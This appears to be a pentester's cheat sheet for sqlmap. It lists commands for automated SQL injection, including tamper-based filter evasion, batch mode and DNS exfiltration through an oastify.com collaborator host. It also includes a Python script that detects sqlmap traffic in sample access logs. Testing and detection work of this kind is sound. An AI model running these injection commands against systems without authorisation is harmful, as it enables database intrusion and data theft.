SQLmap
Automate SQL Injections
Documentation
https://github.com/sqlmapproject/sqlmap/wiki/Usage
From Request - HTTP:80
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
From Request - HTTPS:443
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
Alternatively, omit --force-ssl and give the Host header in the http.request file an explicit port: Host: server:443
Batch (silent) mode: run without interactive questions
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
DNS Collaborator (under root)
Tip: register an additional HTTP proxy listener on port 8081 and send all sqlmap probes through it, so the proxy history can be filtered by that listener.
Use the --dns-domain switch to instruct sqlmap to use DNS probes against your collaborator server (sqlmap binds its own DNS listener on UDP/53, hence root).
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
Tampering
Tamper scripts encode or transform the payload; select them with the --tamper switch.
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode"
A list of all existing tamper scripts is available with the --list-tampers switch or in the /tamper folder of the GitHub repository.
URL target & Parameters
sqlmap -u http://domain?id=1 -p id
You can read the HTTP request from a file and mark the injection point with an asterisk (*).
sqlmap -r ./sql.req
# sql.req contains the raw HTTP request, with an asterisk (*) marking the parameter to inject
GET /path/to/username*
Host: servername:port
HTTP Proxy
sqlmap --proxy=http://127.0.0.1:8080
Databases
The most common DBMS values are listed below; for the remaining ones see the --dbms entry in the sqlmap wiki.
--dbms=mssql|mysql|postgresql|oracle
Base64 Encoding
By default sqlmap URL-encodes the values it places in the query string. When the payload has to be base64-encoded instead, use the following switch with the parameter name:
sqlmap -u domain?p1=value --base64=p1
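Seen from the server side, the tamper and base64 options above leave recognisable traces in access logs. As an added example (not part of the original page or of sqlmap itself), this Python script scans constructed log lines for three of them: the default sqlmap User-Agent, charencode-style percent-encoding of letters and digits, and a base64 parameter value that decodes to SQL. The log lines, IPs and User-Agent strings are constructed samples.

```python
import re
import base64
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=%31%20%41%4E%44%20%31%3D%31 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?p1=MSBPUiAxPTE= HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# %XX encoding of a letter or digit is never produced by a browser, but it is
# exactly what the charencode tamper does to every byte of the payload.
ENCODED_ALNUM_RE = re.compile(r"%(3[0-9]|[46][1-9A-F]|[57][0-9A])", re.I)
SQL_FRAGMENTS = ("SELECT", "UNION", " AND ", " OR ", "SLEEP(", "WAITFOR", "--")

def looks_base64_sql(value: str) -> bool:
    """True if value is valid base64 that decodes to text containing a SQL fragment."""
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return any(frag in decoded.upper() for frag in SQL_FRAGMENTS)

def classify(line: str) -> list:
    """Return the indicator labels seen on one log line (empty list = nothing seen)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    hits = []
    if m.group("ua").lower().startswith("sqlmap"):
        hits.append("sqlmap-user-agent")
    query = urlsplit(m.group("target")).query  # raw, still percent-encoded
    if len(ENCODED_ALNUM_RE.findall(query)) >= 3:  # tolerate a stray %41 or two
        hits.append("charencode-tamper")
    if any(looks_base64_sql(v) for _, v in parse_qsl(query, keep_blank_values=True)):
        hits.append("base64-sql-payload")
    return hits

def scan(lines):
    """Map line index -> indicators for every line that triggered at least one."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}
```

The User-Agent check is trivially defeated by --random-agent, so the encoding heuristics carry more weight than the UA match.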
HTTP method - DELETE
sqlmap --method=DELETE -u http://domain -p param1